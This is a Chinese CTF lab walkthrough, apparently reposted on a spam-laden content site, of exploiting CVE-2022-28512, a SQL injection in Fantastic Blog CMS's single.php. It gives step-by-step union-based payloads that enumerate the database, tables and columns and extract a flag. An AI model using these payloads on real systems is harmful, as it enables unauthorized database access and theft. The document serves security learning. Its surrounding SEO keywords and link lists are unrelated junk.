当前位置: 首页 > news >正文

宁波网站建设公司哪家好湖南网站开发公司

宁波网站建设公司哪家好,湖南网站开发公司,wap网页程序,安徽省建设工程八大员报名网站文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。…

文章目录

  • 前言
  • 一、CVE-2022-28512靶场简述
  • 二、找注入点
  • 三、CVE-2022-28512漏洞复现
    • 1、判断注入点
    • 2、爆显位个数
    • 3、爆显位位置
    • 4 、爆数据库名
    • 5、爆数据库表名
    • 6、爆数据库列名
    • 7、爆数据库数据
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、CVE-2022-28512靶场简述

Sourcecodester Fantastic Blog CMS 1.0 中存在一个 SQL 注入漏洞。攻击者可以通过“id=5”参数在“/fantasticblog/single.php”中注入查询。
在这里插入图片描述

二、找注入点

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
我们就尝试找single.php的界面。
打开发现是有一个登录框,和一个登录注册。但是登录框是search.php,而且尝试sql注入也是无果。(如图所示)
在这里插入图片描述在这里插入图片描述
点开图片发现跳转到single.php界面,成功找到注入地方(如图所示)
在这里插入图片描述

三、CVE-2022-28512漏洞复现

  • 1、判断注入点
  • 2、爆显位个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

(如图所示)这里我们老规矩抛出and 1=1 和 and 1=2测试。发现页面依旧正常,排除数字型。直接提交3’发现报错,报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near ‘‘3’’’ at line 1

在这里插入图片描述
通过报错信息可以知道是单引号闭合,这里构造的payload为

id=3'--+

2、爆显位个数

注入语句为

id=3' order by 9--+

发现为10的时候报错,那么显位个数是9了。
在这里插入图片描述

3、爆显位位置

注入语句为

id=-3' union select 1,2,3,4,5,6,7,8,9--+

发现有4可以注入,我就在4注入了
在这里插入图片描述

4 、爆数据库名

注入语句为

id=-3' union select 1,2,3,database(),5,6,7,8,9--+

在这里插入图片描述

得到数据库ctf

5、爆数据库表名

注入语句为

id=-3' union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--+

在这里插入图片描述
得到数据库表名
titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info
关键表名是flag

6、爆数据库列名

注入语句为

id=-3' union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name="flag"--+

得到列名flag

在这里插入图片描述

7、爆数据库数据

注入语句为

id=-3' union select 1,2,3,group_concat(flag),5,6,7,8,9 from flag --+

在这里插入图片描述
得到flag
flag{6bf76a30-c821-429b-b2e7-03b6068cdf36}


总结

这一关的信息收集比较简单,一下子找到注入点了。这是一个简单的单引号闭合简单注入,极其简单。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

http://www.yayakq.cn/news/401792/

相关文章:

  • 手机网站pc网站珠海斗门网站建设
  • 儿童玩具商城网站建设qq空间电脑版
  • 苏州 手机网站微信公众 wordpress
  • 桥梁建设杂志有假网站吗广告公司网站建设的定位
  • 电商网站的建设的主要目的网站制作源码版权
  • 单页加盟网站模板Md5(Wordpress)解密
  • 动力无限做网站设计手机网站建设
  • 宁波自适应网站建设网站HTML怎么做链接
  • 太平桥网站建设网站域名批量查询
  • 电脑做网站主机iis网站筛选器被挂马
  • 美工做网站尺寸多少电子商务网站建设品牌
  • 网站建设方案的所属行业是建设网站二级子页打不开
  • 权重高的网站是几查企业的app软件 排名
  • 做办公室的网站大型门户网站建设价格
  • 品牌运营具体做什么南昌seo网站
  • 成都网站建设电话咨询电子商务是建网站
  • 门户网站建设采购手机网站建设规划书
  • 网站开发合同样本龙之网官网
  • 网站的logo怎么换昆明网站建设首选互维
  • 昆明网站如何制作推广费用一般多少钱
  • 做网站需要具备什么要求农村自建房设计图效果图
  • 能够给上市公司做网站意味着什么做交易平台的网站需要哪些技术
  • app界面设计欣赏网站wordpress最简洁主题
  • 企业网站管理系统手机版教程公司网站 优帮云
  • 做金融必看网站易语言编程可以做网站么
  • 上海制作网站的公司自己搭建局域网云桌面终端
  • 营销型网站和普通网站一级域名如何分发二级域名
  • 南京集团网站建设代理公司注册公司商标
  • 有没有专门做一件代发的网站中企动力做网站5个月了
  • 苏州h5模板建站网络seo招聘